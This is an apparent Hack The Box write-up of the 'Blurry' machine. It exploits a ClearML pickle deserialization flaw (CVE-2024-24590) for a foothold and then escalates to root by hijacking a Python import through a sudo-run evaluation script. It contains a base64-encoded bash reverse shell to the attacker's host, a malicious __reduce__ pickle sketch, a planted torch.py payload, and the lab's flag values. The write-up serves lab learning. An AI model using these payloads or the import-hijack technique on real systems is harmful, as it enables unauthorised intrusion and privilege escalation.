
Blurry
Hack The Box Machine Writeup

I think I need glasses for this one!
Summary
Blurry was a Linux box on the easier and shorter side of medium. While it centers on machine learning, no ML exploitation is required to complete the box. The user step involves a pickle deserialization vulnerability in the ClearML web application, known as CVE-2024-24590. The root step revolves around code review and Python import hijacking.
For the user step, the attacker first enumerates a handful of virtual host subdomains. Interestingly, in my path through the box none of them mattered except app.blurry.htb, which hosts a ClearML web application. Searching for exploits quickly turns up a PoC for CVE-2024-24590, and after some initial configuration it can be used to get a shell directly as jippity and grab user.txt.
The root step is similarly straightforward but involves a lot of code review. Enumerating sudo privileges reveals that jippity can run a bash script called evaluate_model as root. Reviewing this script shows that it checks model files for malicious pickles and then passes them to an evaluate_model.py script. That script does some machine learning work, but what matters is that it imports torch. The attacker can then discover that they have write permissions over /models, the directory the Python script runs from. This is important because Python searches the script's own directory first when resolving imports: dropping a malicious payload into /models/torch.py means it gets imported by evaluate_model.py, which runs as root via the evaluate_model bash script we can invoke with sudo. When evaluate_model.py imports torch, our payload executes instead, granting a shell as root and completing the box.

Mr. Krabs when trying to do this box
User
Recon
Portscan with Nmap
I started off enumeration as I normally do with a port scan using nmap: -sC for default NSE scripts, -sV for version enumeration, and sudo so it runs a -sS SYN scan by default.
┌─[us-dedivip-1]─[10.10.14.176]─[htb-mp-904224@htb-jzato00bew]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV 10.129.170.13
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-12 13:49 BST
Nmap scan report for 10.129.170.13
Host is up (0.030s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e21d5dc2e61eb8fa63b242ab71c05d3 (RSA)
| 256 3911423f0c250008d72f1b51e0439d85 (ECDSA)
|_ 256 b06fa00a9edfb17a497886b23540ec95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.80 seconds
This scan shows a subdomain/virtual host app.blurry.htb, which I will add to my /etc/hosts file along with blurry.htb.
Virtual Host Fuzz with Wfuzz
I always like to fuzz for other virtual hosts when I have a domain. I run the scan once to find the default response size, then filter it out by character count with --hh so only differing responses are returned.
┌─[us-dedivip-1]─[10.10.14.176]─[htb-mp-904224@htb-jzato00bew]─[~/Desktop]
└──╼ [★]$ wfuzz -u http://blurry.htb -H "Host:FUZZ.blurry.htb" -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hh 169
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://blurry.htb/
Total requests: 19983
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000051: 400 0 L 4 W 280 Ch "api"
000000070: 200 448 L 12829 W 218733 Ch "chat"
000000096: 200 0 L 1 W 2 Ch "files"
000000111: 200 28 L 363 W 13327 Ch "app"
Total time: 0
Processed Requests: 19983
Filtered Requests: 19979
Requests/sec.: 0
This scan discovers api, chat, and files, plus app, which we had already found. I added all of these to /etc/hosts, noting that api returns a 400 response and files returns only 2 characters.
10.10.11.19 api.blurry.htb chat.blurry.htb files.blurry.htb app.blurry.htb blurry.htb
app.blurry.htb
I started off enumerating the web server on port 80 via the app.blurry.htb virtual host we were redirected to by default.
Ironic given the name of the machine
It appears to be a ClearML instance. ClearML is an open-source MLOps platform designed to streamline the entire machine learning workflow. On entering a name and logging in we are presented with a dashboard with quite a few options and things to enumerate.
You never know where a vulnerability will hide in a web application dashboard
I will come back to this later, my guess is that I can exploit the platform by adding in malicious commands to a project to be built, but it's always good to fully enumerate before attempting exploitation.

This explains why I am bad at AI, too much math!
chat.blurry.htb
This virtual host presents us with a login for Rocket Chat.
Always good to try and see if you can register a user/enumerate usernames from login forms
I am able to make an account and log in to the service. There is just one channel, general, with some chatter that is not super useful, though we do get usernames. There is mention of a vision algorithm, which is likely a hint.
General chat open to the internet? Doesn't seem safe to me
files.blurry.htb
The files virtual host simply returns an OK.
Likely an API or file directory location
This is a perfect time for a directory brute-force scan, which I did using feroxbuster. It did not return any hits, however.
api.blurry.htb
The api vhost does appear to be an API, with the default route returning an "invalid request path" message.
That's a lot of error info
I ran a feroxbuster directory scan against this site as well, but it did not return anything of value either.
ClearML CVE-2024-24590
The ClearML instance seems like the most likely path forward at this point. Searching for public exploits, I quickly came across CVE-2024-24590, a pickle deserialization vulnerability. There was a good PoC by xffsec here. I used git clone to download the exploit, then installed the requirements with pip.
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit.git
Cloning into 'CVE-2024-24590-ClearML-RCE-Exploit'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 7 (delta 0), reused 7 (delta 0), pack-reused 0
Receiving objects: 100% (7/7), 11.81 KiB | 2.95 MiB/s, done.
┌──(kali㉿kali)-[~/Desktop]
└─$ cd CVE-2024-24590-ClearML-RCE-Exploit
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ pip3 install -r requirements.txt
<...>
Successfully installed clearml-1.16.2 furl-2.1.3 orderedmultidict-1.0.1 pathlib2-2.3.7.post1 referencing-0.35.1 rpy-0.18.1
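Before running the PoC, it is worth a quick note on the bug class. CVE-2024-24590 abuses Python pickle deserialization: a pickled object can define __reduce__, which tells the unpickler to call an arbitrary callable on load, and vulnerable ClearML versions deserialize uploaded artifacts with pickle when they are fetched. A minimal sketch of the idea (illustrative only, not the PoC's actual payload):
import os
import pickle

class MaliciousArtifact:
    # __reduce__ tells the unpickler to call os.system('id') when this object is loaded
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(MaliciousArtifact())
pickle.loads(payload)  # executes `id` -- whoever loads the artifact runs the command
The PoC uploads a payload like this as an artifact to a ClearML project, so whatever fetches artifacts from that project ends up executing the attacker's command.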
I was getting an error when attempting to run the exploit. This was due to a pathing issue and was resolved by adding ~/.local/bin to my PATH.
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ python3 exploit.py
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⣠⣴⣶⣾⣿⣿⣿⣷⣶⣤⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⢀⣴⣿⣿⣿⡿⠿⠟⠛⠻⠿⣿⣿⣿⡷⠆⠄⠄⠄⠄⠄
⠄⠄⠄⠄⢠⣿⣿⣿⠟⠁⠄⠄⠄⠄⠄⠄⠄⠉⠛⠁⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢠⣿⣿⣿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢸⣿⣿⡇⠄⠄⠄⠄⣠⣾⠿⢿⡶⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⢸⣿⣿⣿⣿⡇⠄⠄⠄⠄⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⣿⣿⣿⣿⣷⡀⠄⠄⠄⠙⠿⣶⡾⠟⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠘⣿⣿⣿⣿⣷⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠘⢿⣿⣿⣿⣿⣷⣦⣤⣀⣀⣠⣤⣴⣿⣿⣷⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠁⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠈⠛⠻⠿⣿⣿⡏⠉⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
CVE-2024-24590 - ClearML RCE
============================
[1] Initialize ClearML
[2] Run exploit
[0] Exit
[>] Choose an option: 1
[+] Initializing ClearML
[i] Press enter after pasting the configuration
sh: 1: clearml-init: not found
[!] Terminating...
[?] Do you want to go back to the main menu or exit? (menu/exit):
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ export PATH=$PATH:~/.local/bin
Then we can generate new credentials by going to /settings/workspace-configuration, as outlined in the exploit. Copy and paste the API configuration from the web page into the exploit.
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ python3 exploit.py
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⣠⣴⣶⣾⣿⣿⣿⣷⣶⣤⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⢀⣴⣿⣿⣿⡿⠿⠟⠛⠻⠿⣿⣿⣿⡷⠆⠄⠄⠄⠄⠄
⠄⠄⠄⠄⢠⣿⣿⣿⠟⠁⠄⠄⠄⠄⠄⠄⠄⠉⠛⠁⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢠⣿⣿⣿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢸⣿⣿⡇⠄⠄⠄⠄⣠⣾⠿⢿⡶⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⢸⣿⣿⣿⣿⡇⠄⠄⠄⠄⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⣿⣿⣿⣿⣷⡀⠄⠄⠄⠙⠿⣶⡾⠟⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠘⣿⣿⣿⣿⣷⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠘⢿⣿⣿⣿⣿⣷⣦⣤⣀⣀⣠⣤⣴⣿⣿⣷⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠁⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠈⠛⠻⠿⣿⣿⡏⠉⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
CVE-2024-24590 - ClearML RCE
============================
[1] Initialize ClearML
[2] Run exploit
[0] Exit
[>] Choose an option: 1
[+] Initializing ClearML
[i] Press enter after pasting the configuration
ClearML SDK setup process
Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration
In settings page, press "Create new credentials", then press "Copy to clipboard".
Paste copied configuration here:
Thank you for the access keys!
ClearML SDK setup process
Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration
In settings page, press "Create new credentials", then press "Copy to clipboard".
Paste copied configuration here:
Detected credentials key="HU3FF893M1YK5R5ZE6DP" secret="STzx***"
ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb
Verifying credentials ...
Credentials verified!
New configuration stored in /home/kali/clearml.conf
ClearML setup completed successfully.
[?] Do you want to go back to the main menu or exit? (menu/exit): menu
We can then go back to the main menu and enter 2 to run the exploit. Make sure to start a listener, then pass in our IP and port. For the target project name we need to go back to the web application and find the project named Black Swan (also an ironic name). Remember that it is case sensitive; pass this into the exploit, and after a little while we should catch a shell.
Black Swan certainly is a suspicious name
[>] Choose an option: 2
[+] Your IP: 10.10.14.48
[+] Your Port: 42069
[+] Target Project name Case Sensitive!: Black Swan
[+] Payload to be used: echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OC80MjA2OSAwPiYxIg== | base64 -d | sh
[?] Do you want to start a listener on 42069? (y/n): n
[!] Remember to start a listener on 42069
ClearML Task: created new task id=35f78c5b62f940b8b949cf633132f878
ClearML results page: http://app.blurry.htb/projects/116c40b9b53743689239b6b460efd7be/experiments/35f78c5b62f940b8b949cf633132f878/output/log
[i] Please wait...
ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 42069
listening on [any] 42069 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.11.19] 35204
bash: cannot set terminal process group (2264): Inappropriate ioctl for device
bash: no job control in this shell
jippity@blurry:~$
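Out of curiosity, we can confirm what the PoC's base64 payload actually runs by decoding it (a quick check in Python):
import base64

payload = "YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OC80MjA2OSAwPiYxIg=="
print(base64.b64decode(payload).decode())
# bash -c "bash -i >& /dev/tcp/10.10.14.48/42069 0>&1"
As expected, it is just a standard bash reverse shell pointed at our listener.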

In honor of the pickle deserialization
Shell as jippity
Whenever I get a shell I like to upgrade the TTY so that I can use tab auto-complete and the arrow keys. My go-to way to do this is with script. I then grabbed user.txt.
jippity@blurry:~$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
jippity@blurry:~$ ^Z
zsh: suspended nc -lvnp 42069
┌──(kali㉿kali)-[~/Desktop]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 42069
reset
reset: unknown terminal type unknown
Terminal type? screen
jippity@blurry:~$ cat user.txt
eff90bd78da48a4080fde673733f0229

The IQ curve meme is in the top 5 best all time
Root
Enumeration
Sudo privileges
Starting off by checking sudo privileges with sudo -l, we can see that the jippity user can run /usr/bin/evaluate_model as root. What stands out is the * wildcard in the allowed filename.
jippity@blurry:~$ sudo -l
Matching Defaults entries for jippity on blurry:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
This is almost certainly the way forward, so I next spent some time looking over the evaluate_model binary, which happens to just be a bash script.
evaluate_model
jippity@blurry:~$ cat /usr/bin/evaluate_model
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")
    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
This Bash script is designed to evaluate a given model file against a proprietary dataset, with included security checks to ensure the model file is safe to use. Here’s a step-by-step breakdown of what the script does:
Argument Check
if [ "$#" -ne 1 ]; then
/usr/bin/echo "Usage: $0 <path_to_model.pth>"
exit 1
fi
This checks if exactly one argument (the path to the model file) is provided. If not, it prints a usage message and exits with status code 1.
Variable Initialization
MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"
Create Temporary Directory
/usr/bin/mkdir -p "$TEMP_DIR"
This creates a temporary directory to store extracted files from the model file.
Determine File Type
file_type=$(/usr/bin/file --brief "$MODEL_FILE")
This determines the type of the model file using the `file` command.
Extract Files Based on File Type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
/usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
/usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
/usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
exit 2
fi
Depending on whether the file is a POSIX tar archive or a Zip archive, the script extracts the contents to the temporary directory. If the file type is unsupported, it prints an error message and exits with status code 2.
Security Check for Pickle Files
/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")
if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
/usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
/bin/rm "$MODEL_FILE"
break
fi
done
This section finds all pickle files (`*.pkl` or `pickle`) in the temporary directory and checks each one for malicious content using `fickling` and `jq`. If any file is found to be overtly malicious, the original model file is deleted, and the loop breaks.
Cleanup
/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"
This removes all files and the temporary directory created during extraction.
Model Evaluation
if [ -f "$MODEL_FILE" ]; then
/usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
/usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
If the model file is still present (i.e., it wasn’t deleted due to being malicious), it is considered safe. The script then proceeds to evaluate the model by calling a Python script (`evaluate_model.py`) with the model file as an argument.
In summary, the script ensures the provided model file is safe by checking its format, extracting its contents, and scanning for any malicious pickle files before finally evaluating the model with the Python script whose path is hard-coded in the PYTHON_SCRIPT variable: /models/evaluate_model.py. For completeness I checked our environment variables, but nothing there changes which script gets run.
jippity@blurry:/models$ env
SHELL=/bin/sh
TRAINS_PROC_MASTER_ID=2265:4f82d1b209cc4a2a9768ebe9c255b476
PWD=/models
LOGNAME=jippity
HOME=/home/jippity
LANG=en_US.UTF-8
LS_COLORS=
SHLVL=3
CLEARML_PROC_MASTER_ID=2265:4f82d1b209cc4a2a9768ebe9c255b476
PATH=/usr/bin:/bin:/home/jippity/.local/bin:/home/jippity/.local/bin
_=/usr/bin/env
OLDPWD=/
Python is both a blessing and a curse upon humanity
evaluate_model.py
Looking in the /models directory we can find evaluate_model.py. This is the Python script being run by the /usr/bin/evaluate_model bash script.
jippity@blurry:/models$ cat evaluate_model.py
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys

class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x

def load_model(model_path):
    model = CustomCNN()
    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)
    model.eval()
    return model

def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])
    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader

def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')

def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1]  # Path to the .pth file
        main(model_path)
Imports
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys
These imports bring in the necessary libraries for creating neural networks (`torch` and `torch.nn`), handling datasets and transformations (`torchvision`), and managing data loading (`DataLoader`, `Subset`). `numpy` is used for numerical operations, and `sys` is used for handling command-line arguments.
CustomCNN Class
class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x
This defines a custom convolutional neural network (CNN) named `CustomCNN`. The network includes two convolutional layers, max pooling, two fully connected layers, and ReLU activations.
Load Model Function
def load_model(model_path):
    model = CustomCNN()
    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)
    model.eval()
    return model
This function loads the model's state from a specified path (`model_path`), initializes an instance of `CustomCNN`, and loads the state dictionary into the model. The model is set to evaluation mode (`model.eval()`), which is important for operations like dropout and batch normalization to behave correctly during evaluation.
Prepare Dataloader Function
def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])
    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader
This function prepares a data loader for the CIFAR-10 test dataset: it applies random flips and crops plus normalization, loads the dataset from /root/datasets/ without downloading, takes a random 64-image subset, and wraps it in a DataLoader with a batch size of 32.
Evaluate Model Function
def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')
This function evaluates the model's performance on the provided data loader: with gradients disabled, it runs each batch through the model, tallies correct predictions against the labels, and prints the overall accuracy.
Main Function
def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1]  # Path to the .pth file
        main(model_path)
The `main` function is the entry point of the script: it loads the model, prepares the data loader, and runs the evaluation. The `__main__` guard simply checks that a model path was passed on the command line.
In summary, this code implements the complete process of loading a pre-trained neural network model and evaluating its accuracy on the CIFAR-10 image classification dataset, with the model file path passed on the command line.
None of this is directly exploitable, however; the most important aspect is the import statements.

Matlab lol
Hijacking Torch Python Import
We can see that our user jippity has write privileges over the /models directory. This matters because Python's import search order is:
1. The directory from which the input script was run (or the current directory if the interpreter is being run interactively).
2. Directories listed in the `PYTHONPATH` environment variable.
3. Standard library directories.
This means we can create a torch.py file containing a shell payload; since it sits in the same directory as evaluate_model.py, it will be imported in place of the real torch package. When evaluate_model.py runs import torch as root, our payload executes and grants us a root shell. We can use demo_model.pth as the model to be evaluated, since its contents have no effect on the exploit chain.
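As a sanity check, here is a minimal local demonstration of the shadowing behavior (file names here are illustrative, not from the box):
# demo_shadow.py -- create a file named torch.py next to this script
# (e.g. containing just: print("hijacked!")), then run: python3 demo_shadow.py
import sys
print(sys.path[0])     # the script's own directory, searched before site-packages

import torch           # resolves to ./torch.py, executing its top-level code
print(torch.__file__)  # confirms the local file is what got imported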
jippity@blurry:/$ ls -la
total 72
drwxr-xr-x 19 root root 4096 Jun 3 09:28 .
drwxr-xr-x 19 root root 4096 Jun 3 09:28 ..
lrwxrwxrwx 1 root root 7 Nov 7 2023 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jun 3 09:28 boot
<...>
drwxrwxr-x 2 root jippity 4096 Jun 17 14:11 models
<...>
jippity@blurry:/models$ echo 'import os; os.system("bash")' > /models/torch.py
jippity@blurry:/models$ ls
demo_model.pth evaluate_model.py torch.py
jippity@blurry:/models$ cat torch.py
import os; os.system("bash")
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model.pth
[+] Model /models/demo_model.pth is considered safe. Processing...
root@blurry:/models# id
uid=0(root) gid=0(root) groups=0(root)
We can now grab root.txt and complete the box.
root@blurry:~# cd /root
root@blurry:~# cat root.txt
a3845548ef434fa06d1d4da247830059

Congrats on one more box completed before the AI overlords take control
Additional Resources
IppSec video walkthrough
0xdf writeup
0xdf.gitlab.io